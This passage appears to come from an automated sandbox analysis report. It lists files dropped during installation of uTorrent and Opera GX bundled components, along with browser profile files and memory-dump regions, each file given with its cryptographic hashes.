SHA512 49557a9fe987753d02b0cbed9b87d1b4ad101f778a36dfe0ad4ae96afc1a80ea9d5bf8d9ae6b883150c0ae135518ac160a628815625ac9e3989451f674429c98

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

MD5 04a49e8b8b265e06df1565726e43d203
SHA1 11c24f4999b85cbb7ab1c2f4f47be4fb1415af1c
SHA256 9e1007b75b70da562830bcae479ffd7cbc5b4e4b7b16bda25a66a294a056b421
SHA512 85747a2523d7c11a814dc233c3ec38b65e21f23c0f75bb7f73d2a3db0197549bb7de1d7b7d30b60e5eaeea01ede7c827f54a406f29c076cde9aacf1c8f3db2b8

C:\Users\Admin\AppData\Roaming\utorrent\resume.dat.temp

MD5 86de624a8684937cc1f163add12fb2ed
SHA1 a0c24ddffb8ac1deb7564b316493de0e89537f4b
SHA256 5c280b9eb0a3e0f2fdf76d6e3393e1d682dfec66694e1b3eda86b72bc13a3d8e
SHA512 269b2fb1b93fe352ecaffe66e41ad2692478d1d0ebce6441aac692589235326e0194c7161131c32874d067c8b77521a0f79c605416245904e858baa0ce20a1f0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 8d3e06db0dd19b4e9ed5ac31d4ff99a9
SHA1 36f5d36deb0f1482303d84721974efa9a76b1129
SHA256 459404e84cbcefd995e5704209f3ad512febf11c5bf3e697802331a4efc2de96
SHA512 dfc7741268cb34b510a3a41dd11fa8b36af9c1853fc92927d129dd0583c8c640955546d75f35af444cdab8dfb8365d5e9fab6e38665c102a81ce52143b2361e8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 9fb26436c17434919373e6a1994934b7
SHA1 59ce26759f6350685a466d7f43208f7d28306e5b
SHA256 7f75dbb756360f9b8180481296bd232d0cf443fda6d137f279f9b1905317fef2
SHA512 300bb83b57963c0453f50f8cb0329babaf90c2d58fbc58ee924101050ca8de77dac5438b9ef2c694f5935a4f8ce96e8383312c8f63e5eb4ba9b524efe00738ae

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\Code Cache\js\index-dir\the-real-index

MD5 31ad99d179ab5c43c059b3e682e44113
SHA1 7b059bd1950966eadefa60784ba5608b8e021fa9
SHA256 b778dc228b4fc2e737f2b927d3cc8fed4fdfb317fdc9cda65e2f964b3d59ebf2
SHA512 0e604495f9009348fd8838acaad033c408bbb569aed74e6e2588ce246c2a9a821208880208536c61ed2451d6a6c2fcba8f8da691ab288360677b08cbb57204ab

memory/2404-2507-0x0000000000400000-0x0000000000B7B000-memory.dmp

memory/2404-2518-0x0000000000400000-0x0000000000B7B000-memory.dmp

memory/1008-2530-0x0000000002D00000-0x0000000002D36000-memory.dmp

memory/1008-2531-0x00000000054E0000-0x0000000005B0A000-memory.dmp

memory/1008-2532-0x0000000005380000-0x00000000053A2000-memory.dmp

memory/1008-2533-0x0000000005C00000-0x0000000005C66000-memory.dmp

memory/1008-2534-0x0000000005C70000-0x0000000005CD6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y0ghk4ch.htb.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1008-2543-0x0000000005CE0000-0x0000000006037000-memory.dmp

memory/1008-2546-0x0000000006190000-0x00000000061AE000-memory.dmp

memory/1008-2547-0x00000000061D0000-0x000000000621C000-memory.dmp

memory/1008-2557-0x00000000077E0000-0x0000000007E5A000-memory.dmp

memory/1008-2558-0x00000000066D0000-0x00000000066EA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nsw955A.tmp\nsProcess.dll

MD5 faa7f034b38e729a983965c04cc70fc1
SHA1 df8bda55b498976ea47d25d8a77539b049dab55e
SHA256 579a034ff5ab9b732a318b1636c2902840f604e8e664f5b93c07a99253b3c9cf
SHA512 7868f9b437fcf829ad993ff57995f58836ad578458994361c72ae1bf1dfb74022f9f9e948b48afd3361ed3426c4f85b4bb0d595e38ee278fee5c4425c4491dbf

C:\Users\Admin\AppData\Local\Temp\nsw955A.tmp\INetC.dll

MD5 92ec4dd8c0ddd8c4305ae1684ab65fb0
SHA1 d850013d582a62e502942f0dd282cc0c29c4310e
SHA256 5520208a33e6409c129b4ea1270771f741d95afe5b048c2a1e6a2cc2ad829934
SHA512 581351aef694f2489e1a0977ebca55c4d7268ca167127cefb217ed0d2098136c7eb433058469449f75be82b8e5d484c9e7b6cf0b32535063709272d7810ec651

C:\Users\Admin\AppData\Local\Temp\nsw955A.tmp\blowfish.dll

MD5 5afd4a9b7e69e7c6e312b2ce4040394a
SHA1 fbd07adb3f02f866dc3a327a86b0f319d4a94502
SHA256 053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae
SHA512 f78efe9d1fa7d2ffc731d5f878f81e4dcbfaf0c561fdfbf4c133ba2ce1366c95c4672d67cae6a8bd8fcc7d04861a9da389d98361055ac46fc9793828d9776511

C:\Users\Admin\AppData\Local\Temp\is-RENLJ.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

C:\ProgramData\erBlurayStation\sqlite3.dll

MD5 e477a96c8f2b18d6b5c27bde49c990bf
SHA1 e980c9bf41330d1e5bd04556db4646a0210f7409
SHA256 16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660
SHA512 335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

memory/804-2643-0x0000000000400000-0x0000000000737000-memory.dmp

memory/4576-2657-0x0000000005A80000-0x0000000005DD7000-memory.dmp

memory/4576-2658-0x0000000006570000-0x00000000065BC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Opera_installer_2411150355201185588.dll

MD5 3d0b13763c6696221cd6e7524b974ca8
SHA1 eeb708cbcd0ccb345c73306eb878d4199f8ee85b
SHA256 528508786ad5fa13459642873f63d50b627b97f61af806ea3435c42551e1e368
SHA512 454277b795acc603c4c952962a41962d0f4ff879eaf1af664e6c65c577c410738bde6cff56eabc604304aa1b2e0e4c031d8236f5ba8821406fdeff60b7d09885

C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\setup.exe

MD5 a16e857704e7635dde8cd009062b2aae
SHA1 677a0463e9af29ba2d450e6312b250ac627adb24
SHA256 f4a67d808955567da2212a980afaa0bdc003ed2c5be4017781e3985a63fa0c68
SHA512 0f933d04534212d35c2a691c440662508ce81c7c091c9ce0198640859421d3099546475b91289a2459454e67c4b9e8989f799a9a1c2579d1c935cdc8edf31a16

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\Network Persistent State

MD5 7b73a9c50304bb816e0da1bdb11f1139
SHA1 cd53109c2aff8474a1f3aef9dd4d8541fd1b5508
SHA256 97158d55ea1d4a0b5b48f70a04c4110c085f91c039442457fff36c5e4a4fb31b
SHA512 7b413d3e9858309487029b84baacb3f459ea61b4aff37355f8e6cbd607a3972f77e2c47ad9922825fab1412562c3479e42a24be48ea9a1d8d9725e5610be4d37

memory/4984-2726-0x0000000000400000-0x00000000009C3000-memory.dmp

memory/4984-2733-0x0000000000400000-0x00000000009C3000-memory.dmp

memory/1884-2764-0x0000000005780000-0x0000000005AD7000-memory.dmp

memory/1884-2766-0x0000000005E80000-0x0000000005ECC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202411150355201\assistant\Opera_GX_assistant_73.0.3856.382_Setup.exe_sfx.exe

MD5 e9a2209b61f4be34f25069a6e54affea
SHA1 6368b0a81608c701b06b97aeff194ce88fd0e3c0
SHA256 e950f17f4181009eeafa9f5306e8a9dfd26d88ca63b1838f44ff0efc738e7d1f
SHA512 59e46277ca79a43ed8b0a25b24eff013e251a75f90587e013b9c12851e5dd7283b6172f7d48583982f6a32069457778ee440025c1c754bf7bb6ce8ae1d2c3fc5

C:\Users\Admin\AppData\Local\Temp\is-SEAEE.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/2012-2817-0x0000000071080000-0x0000000071092000-memory.dmp

memory/4300-2822-0x00000000055C0000-0x0000000005917000-memory.dmp

memory/4300-2831-0x0000000005D10000-0x0000000005D5C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 71a2af28a0199d424a5902682cdb6610
SHA1 8bbca7e9af5e4522ce0c5a69062e8e7a3c59085c
SHA256 f4726f6f32aa606c71944a669f2ad9f8afc576c5ea5ac1005186d979e767a071
SHA512 4910142f1cc09711bf8146e199ebfefe735be21d86e853ae519e9d1dc075a625e3484fa0bb20316b5d316336b7d1af8db5f744bd743b207bc875b384594eb42e

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\Cache\f_000005

MD5 023435a1143f88bd17c6080f24b514f8
SHA1 7ab65ec99970a8f18ee5d0eafe64d285a44ed454
SHA256 030413e641172b48f5a49e49b21293ab4f543ccc588b8ffb29c759bbfbdf5734
SHA512 7dbb8ebc75f6c536091090faaa562219ce0dec2dbf6100615f5140c88611c293b797a2bcfaf27272490b4a3f358140d0a5b7af232b875109962daa35d946f959

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\TransportSecurity

MD5 f95ba3cd7715eb7a7b8f636e4d1cb0d2
SHA1 47a335096d370ebd7edecf8de07601d1aae018d5
SHA256 6d86f8821d38410ae1e3889767601b18675944d9e6d3874c1b0026c8a7e0be12
SHA512 1a54f5f4b86cbfbdf7938aa4dc82c59469e10d167bd14de0ae5c61eed386f5a78c346a86c94ac04f641baa5ff07187ebdb11244c27f9f787123e8ad67ea4b476

memory/7088-2971-0x0000000005E50000-0x00000000061A7000-memory.dmp

memory/7088-2975-0x00000000064F0000-0x000000000653C000-memory.dmp

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\TransportSecurity

MD5 d97c95335e1b570694915f0edfd2c050
SHA1 ae58b4a8718e1a36f5205b67c80d6b3d825e72d4
SHA256 296ae1dc5565d84242cda14fc45ecd0c6fa2d5d3720b8644a7a3ce95720b3d6b
SHA512 0b7dabc5482391c9a44ab880f843f9a1cd175e5f80c78d063eec6604e0f324bce24be49699d1bf8280f93efc3f516257281eb13dfca932695bf772693946537e

memory/6784-3174-0x00000000051D0000-0x0000000005527000-memory.dmp

memory/6784-3176-0x0000000005690000-0x00000000056DC000-memory.dmp

memory/6352-3246-0x000001A7E28E0000-0x000001A7E2902000-memory.dmp

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\Code Cache\js\index-dir\the-real-index

MD5 df38c7480e4d9957c9b60d5b2ad9d642
SHA1 8ae82a60d0c7f6cbb0434024efe057093048ff8f
SHA256 92fdeb7e95c8214acf9588e88ec3ffb9243c3513d3d4e48ddcacac6c923da08b
SHA512 74fad0632ab5af01d11b71da380ddb4ddc2182b5493202e7848d3f8a16b38ca2e8d4a51d9b97450bd5bdaa75e00b0321ccad51b1c3991c36ebc1c72d2ef1a753

C:\Users\Admin\AppData\Local\Temp\nso73A4.tmp\liteFirewall.dll

MD5 165e1ef5c79475e8c33d19a870e672d4
SHA1 965f02bfd103f094ac6b3eef3abe7fdcb8d9e2a5
SHA256 9db9c58e44dff2d985dc078fdbb7498dcc66c4cc4eb12f68de6a98a5d665abbd
SHA512 cd10eaf0928e5df048bf0488d9dbfe9442e2e106396a0967462bef440bf0b528cdf3ab06024fb6fdaf9f247e2b7f3ca0cea78afc0ce6943650ef9d6c91fee52a

memory/7004-3350-0x0000000000270000-0x00000000002A4000-memory.dmp

memory/7004-3351-0x0000000004C60000-0x0000000004CF2000-memory.dmp

memory/7004-3352-0x00000000052B0000-0x0000000005856000-memory.dmp

memory/7004-3353-0x0000000004C10000-0x0000000004C5A000-memory.dmp

memory/7004-3354-0x00000000051A0000-0x000000000527C000-memory.dmp

memory/7004-3365-0x00000000059D0000-0x0000000005A6C000-memory.dmp

memory/7004-3366-0x0000000005E80000-0x0000000005F10000-memory.dmp

memory/7004-3367-0x0000000005F10000-0x0000000006267000-memory.dmp

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\Preferences

MD5 907ffed5711c729126074beb9410cb54
SHA1 33597baa60efa8e4e06c27596a32d7ff7d89bec0
SHA256 f5e6083dff150c5cda9e1f3f9db7ed758ba94aa3fed4eb3bb7729a26f56b669c
SHA512 bd71ef332889864ba9cdf79e344c8b2c782fc2e64b15c93f4b51869c9a26181e0936aba976637afe2d0ace11154324b3b7f1ba875fc6c7c1796b8cbaccc08f51

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Local State

MD5 b2828bc4fa5a03306c681f009815b241
SHA1 b83123f4f73007b9ea671e71d718c6e8663d1238
SHA256 bab57d1601cba130569298b4425c4ec3c4a133be8cc2e95c3b86dd289d4c5537
SHA512 c8994e02c658c9b9eebf97cdf1311d571a22562f7e7c93e6ed9f539b5398deab18e7d0a4203515eae5509f762b7450d09882130d4376154b59c9805d5d3b844c

memory/576-3441-0x0000000004DC0000-0x0000000004E0C000-memory.dmp

C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi

MD5 0378e5034a90c4656830ca53fecb00f4
SHA1 a7b09d9d2ffc6b9144a51fbe9b066124f2d65801
SHA256 e5718e90716972bc91bde4ba71411c871c194817e53a2aa2230aa4ee7a83eebb
SHA512 5eb434ab13afa284828a813b36bcef9254f0154feefaa68547731fe689520bcb3eb57dcb49a0337a9a16f02106959602f8ebdcbb882202950db8aeb37786b9b9

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\_locales\en\messages.json

MD5 33292c7c04ba45e9630bb3d6c5cabf74
SHA1 3482eb8038f429ad76340d3b0d6eea6db74e31bd
SHA256 9bb88ea0dcd22868737f42a3adbda7bf773b1ea07ee9f4c33d7a32ee1d902249
SHA512 2439a27828d05bddec6d9c1ec0e23fc9ebb3df75669b90dbe0f46ca05d996f857e6fbc7c895401fecfae32af59a7d4680f83edca26f8f51ca6c00ef76e591754

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\_locales\pt_BR\messages.json

MD5 5c5a1426ff0c1128c1c6b8bc20ca29ac
SHA1 0e3540b647b488225c9967ff97afc66319102ccd
SHA256 5e206dd2dad597ac1d7fe5a94ff8a1a75f189d1fe41c8144df44e3093a46b839
SHA512 1f61809a42b7f34a3c7d40b28aa4b4979ae94b52211b8f08362c54bbb64752fa1b9cc0c6d69e7dab7e5c49200fb253f0cff59a64d98b23c0b24d7e024cee43c4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\bnaebcjlolajbgllgjlmlfobobdemmki\3.8.26_0\_locales\es\messages.json

MD5 a14d4b287e82b0c724252d7060b6d9e9
SHA1 da9d3da2df385d48f607445803f5817f635cc52d
SHA256 1e16982fac30651f8214b23b6d81d451cc7dbb322eb1242ae40b0b9558345152
SHA512 1c4d1d3d658d9619a52b75bad062a07f625078d9075af706aa0051c5f164540c0aa4dacfb1345112ac7fc6e4d560cc1ea2023735bcf68b81bf674bc2fb8123fb

memory/804-3868-0x0000000000400000-0x0000000000737000-memory.dmp

C:\Users\Admin\AppData\Roaming\Snetchball\info_0.txt

MD5 39649ae4893850da38d179da5c9d78ed
SHA1 172ac592ccb563a729bd43d2e39a9a20bce00f19
SHA256 5528b797e21c9d77a9cc6b617e40981d8706b20e0218388a68b8c56a87e55379
SHA512 dff3d819fd8848c441857e5fa9e2fa759d2f13ad9dc85bd52cd8029e5034d059fb5b127a5cd72c9ecda538110d8b878819138d92025657e2ae47988b0574342d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7bdpohx.default-release\prefs.js

MD5 880f3b7cfc9e1e00801ba58a4115476f
SHA1 5ac0abe1e75bc71473e53b8a6a4c8679c224999c
SHA256 7221286803f6806784d7d302ace5d4d977cc3e947f78287e9648e15a3894376a
SHA512 78649e95803fb03970befa85d0961e4bd19ce57f796571c047b9fec6a2a596b54c9c4638e012af8d1dc1d0555ca2cce12f0e1e3f93416e6f0d18c21c1bc2b2df

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 252e88bcb830a7cc71ae1c38700308c0
SHA1 598798f3c02a67c9fa53facfd918186ad82299fa
SHA256 74d2436b11a1a27e07bc812837759be5da764271d2f22456c1eae5371584bcc0
SHA512 14f0fb10506682e0774fa29a8a2261f3bc20138232761f329cd58e60b159eb2d73a2f76fa4590ee415840e97730573e11c254664890d57604e5c923428d8461c

memory/2012-4120-0x0000000071080000-0x0000000071092000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 26fb9988bfc4a323a338a3cc5040e713
SHA1 d9648c8a19e82d0bd8af8cdb93adbdbc7b92dbb1
SHA256 f04fa0af0c44964099128af02e023b57d0e07e8ac5176ff6b896bb16c6809932
SHA512 a6d9014105d826db76a79ec91396a7335252ffe1fd53dc843e971ae0bb33f57bb36b65fe338a86b51bb4834e1c397e88492df98e77ab9ebc7e34135c2acefaa4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\9025420d-2acc-4ebf-99ab-5c22c1eaa64a.tmp

MD5 5058f1af8388633f609cadb75a75dc9d
SHA1 3a52ce780950d4d969792a2559cd519d7ee8c727
SHA256 cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA512 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 a4bae22c862b4fcadba9a1cfd27f1851
SHA1 2b91286b7cba8479b26e99573cf4ab59bfd5c68f
SHA256 45f9c7a5f05fed4e0c9eff19edcff78166707fe1e8fd675642db1b099e6752f5
SHA512 4ba96f414725f39616cd402bd308b8f561cfe92ee1afa601ee495d3fe5cc14fe2f84810d24485f350ad5f1b9a0b1ca3bbf14038dee3863dbf5514a93ca77af5d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 f4f03fcc967815a7f159efbfe01800f7
SHA1 d4bd07c35f9169f6d4ca10ef31fa546efce761c1
SHA256 0ef83705848016ce5281b424711922db3e8a117e3944fa7dc4a0cbc1aa5253ae
SHA512 53d9965ca216b28b63a18837b6e749569ac8dc0be80a24d9210071e0d3a65235e638a340f0713c9a4f32bc7030f0c01eb2712463d99c631e7a555b14d72794be

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 a1b41aff677ea662e9f1365e621aa6b3
SHA1 cb9d069c5d9592c409d961bcf077f76fdf0a9832
SHA256 e7f058ee26cebc510d3991a9e4b23ee44f0a8700b32481cd347deaaf026e7d91
SHA512 78dbb52715af20345d3f7a934d1480a00d3523a9c95cef150d185d86ceeae3c651d3aca949d524a8980bf9881110142b5f750204acc4bd151442212b4b7cdf8b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 0f9d4f5ac837298ecb6f674fc4214a2d
SHA1 f9c18950c8b5cd50299f9c28b2fff16e4f066963
SHA256 08e995704a23635dd42b2659b78a91379c8e174e237a204b4131e7fabbe4eb8c
SHA512 293d2c2c8e3754105e3fe44ed42daeaa4228f5e39249e572e8d511885d00035424947930f0ddec63b325fa7a8b0251b965e4d7ac63859351a2543938bc1fc6ac

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 8e7fb4d4328e7f5925b2936b96576ebe
SHA1 6293b1eb9ef82c634d7ce265c08bb4cb1901e5d5
SHA256 8a3b54c6a79936cc08de79464352ae6a6b9a20b03957dc4a58399dbcdc478e11
SHA512 0b1955db3311ead33f0d1608054e69502f196e9c765ca69292fb176d07b97cfbc6c3181756e252742c45fc6e6c7d240704bd1ce856314d4690f372e23a019c56

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 a40ecafc6bfeb651bdbd89875923d9e6
SHA1 e42b91dc6c7035aee9a5d563ab54a7d3f4b27500
SHA256 e5da57372add1fcdbc7e8bee88e3c2a46333debda8e1a236d2ed5c344565b7a0
SHA512 c3bf91c60d153302b93e7a0a60faca8ddbd67f658861ef14fb2b50493c62c8a1bacf51da94dae5137ad923390765eeae2339556e4b5ca1ae5cb0b32dc970ea3f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 1aa5f0d8c4e5a5fd2b0597aedc9f9f97
SHA1 bec4db7fb0ca70851201c509b58a5a38f09b1a1f
SHA256 a1ccc226d81064b8c06ff3bc865a95d1fa2b33d0855713cbd49223a566495521
SHA512 62d5e4e1eafd8fb752701916ccaf31a6ec76d0a3a4dd49f4184f59a3c0c9cb9d70e792922a70ce478006b03d3f12a1b179f8909bacafc763b9260dc91cb996a2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 f55e3ecd8af196e4b3fb197d9f9859e0
SHA1 36a8cd8ffdb5d4fc7f187de14b6a240396a646e0
SHA256 257de419df5dfc85c24779883addb385fcbd4b54aea1e679e52b79d1b812bbfc
SHA512 4b80799317f1ca080e72d27c9f8ad5bdb3d60b5ee9a6c8ff00ab64956a33ea456ef7835c78e4c2708028475e9fe6d0486c3ebd1af8f494e6e31e1ed8ba5836ae

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\StdUtils.dll

MD5 c6a6e03f77c313b267498515488c5740
SHA1 3d49fc2784b9450962ed6b82b46e9c3c957d7c15
SHA256 b72e9013a6204e9f01076dc38dabbf30870d44dfc66962adbf73619d4331601e
SHA512 9870c5879f7b72836805088079ad5bbafcb59fc3d9127f2160d4ec3d6e88d3cc8ebe5a9f5d20a4720fe6407c1336ef10f33b2b9621bc587e930d4cbacf337803

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\nsProcess.dll

MD5 f0438a894f3a7e01a4aae8d1b5dd0289
SHA1 b058e3fcfb7b550041da16bf10d8837024c38bf6
SHA256 30c6c3dd3cc7fcea6e6081ce821adc7b2888542dae30bf00e881c0a105eb4d11
SHA512 f91fcea19cbddf8086affcb63fe599dc2b36351fc81ac144f58a80a524043ddeaa3943f36c86ebae45dd82e8faf622ea7b7c9b776e74c54b93df2963cfe66cc7

C:\Users\Admin\AppData\Roaming\utorrent\pro\chrome_100_percent.pak

MD5 d31f3439e2a3f7bee4ddd26f46a2b83f
SHA1 c5a26f86eb119ae364c5bf707bebed7e871fc214
SHA256 9f79f46ca911543ead096a5ee28a34bf1fbe56ec9ba956032a6a2892b254857e
SHA512 aa27c97bf5581eb3f5e88f112df8bfb6a5283ce44eb13fbc41855008f84fb5b111dfe0616c310c3642b7f8ac99623d7c217aecc353f54f4d8f7042840099abc5

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\chrome_200_percent.pak

MD5 5604b67e3f03ab2741f910a250c91137
SHA1 a4bb15ac7914c22575f1051a29c448f215fe027f
SHA256 1408387e87cb5308530def6ce57bdc4e0abbbaa9e70f687fd6c3a02a56a0536c
SHA512 5e6f875068792e862b1fc8bb7b340ac0f1f4c51e53e50be81a5af8575ca3591f4e7eb9239890178b17c5a8ff4ebb23719190d7db0bd8a9aa6dcb4308ffa9a34d

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\d3dcompiler_47.dll

MD5 cb9807f6cf55ad799e920b7e0f97df99
SHA1 bb76012ded5acd103adad49436612d073d159b29
SHA256 5653bc7b0e2701561464ef36602ff6171c96bffe96e4c3597359cd7addcba88a
SHA512 f7c65bae4ede13616330ae46a197ebad106920dce6a31fd5a658da29ed1473234ca9e2b39cc9833ff903fb6b52ff19e39e6397fac02f005823ed366ca7a34f62

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\ffmpeg.dll

MD5 00ffabbb9438a0da15a021451a9c2d0d
SHA1 4bb79fe2b09962c6c46b70d7dfb1f9d9604a22dc
SHA256 aad7e7ac9d74ac18892801950c9728e9c4eacd3b676cbb5d6f63382da2ce0559
SHA512 989d8d0afd3ce64c65a90d1046f28b19e5b125f8b5a565b76b8c950d152d3b9a57d68126888321c7cd8a4985249c1ec649c453e7501aaa4ff60d9662afd85f34

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\icudtl.dat

MD5 76bef9b8bb32e1e54fe1054c97b84a10
SHA1 05dfea2a3afeda799ab01bb7fbce628cacd596f4
SHA256 97b978a19edd4746e9a44d9a44bb4bc519e127a203c247837ec0922f573449e3
SHA512 7330df8129e7a0b7b3655498b2593321595ec29445ea193c8f473c593590f5701eb7125ff6e5cde970c54765f9565fa51c2c54af6e2127f582ab45efa7a3a0f6

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\libEGL.dll

MD5 ef4291ace01485ee773183ee3c1ed5c4
SHA1 9c9d32813a733ebceb25c0dbb9f85ef27f6e0a0f
SHA256 85f238fb7ace3cbdf7c29c72b01307c440f13491b07a509cbc5b9f257a637164
SHA512 a98bfe1845a712943687f0b20d1904bae1b6836ea37f8a2053872f938dceb2f391fadd3db034c0b8563c0b1ab3d4506d13b613ed51780ef10e813c085c830f82

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\libGLESv2.dll

MD5 60e42e83b260582fc96aaf43293d99e1
SHA1 c548a10873f9a57e18c7fbb1fe89685f4cf1ba84
SHA256 25d49934fc220b169cadeb21fc99dc2a8fb1dd5a4f244265799392f0f5f2f8f8
SHA512 6a905e2b9427fb6e4a53080afdc2ae9dc32c54aab5460f88f7d3fd16e7e9a841d332057f58942d54defe91361a54d3cbedba295399cead754f353f80f92f238b

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\LICENSE.electron.txt

MD5 4d42118d35941e0f664dddbd83f633c5
SHA1 2b21ec5f20fe961d15f2b58efb1368e66d202e5c
SHA256 5154e165bd6c2cc0cfbcd8916498c7abab0497923bafcd5cb07673fe8480087d
SHA512 3ffbba2e4cd689f362378f6b0f6060571f57e228d3755bdd308283be6cbbef8c2e84beb5fcf73e0c3c81cd944d01ee3fcf141733c4d8b3b0162e543e0b9f3e63

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\LICENSES.chromium.html

MD5 796505037e030807d9ddd01c93eb353b
SHA1 79a1eac3b505e6d94a6206d4a5198d3cc11ab038
SHA256 9f3f2b4d9bbd3113486839eca85de119fab766450cdca08a4574b80748885708
SHA512 9435273a4541a579a427a295be47af8b81133896f50c97bab1d8ab391089f90186a7fd057b53e8b74829e4747e98428d8b4d242eb6854b1304a94a2891c2fd11

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources.pak

MD5 f5ab76d2b17459b5288b6269b0925890
SHA1 75be4046f33919340014a88815f415beb454a641
SHA256 4f29587bcd952de1dbc0b98df0aa506bd9fcf447e6a7258c5eb7e9eb780e6d6c
SHA512 6ec6a08418743adb5e20218b73169be4f45f5458592219497c3718e620e37871876788937418f1341e0023c1137f9cac715e6bb941f4690febdda993b072feab

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\snapshot_blob.bin

MD5 d276f526d6af118924193274b8456df4
SHA1 19043bde20a58102d48e94a90074ab76cea9401d
SHA256 8613412ebcf462373d4d50f5729f5b9a61ef2b5c599b267f750276c8e29caf25
SHA512 4babc0c7df37a873053b6df8d3a3ad80a7231fbfbaae844297730bc4035c00a248812634a37ed12ccf569b0c250d0f15a153dcda4403f335e5ce270d4e96e186

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\vk_swiftshader.dll

MD5 afb174ccd1abb292da14779a079d4282
SHA1 ddd74e61c48c4445f1b3fa886b7c28b0de3f1859
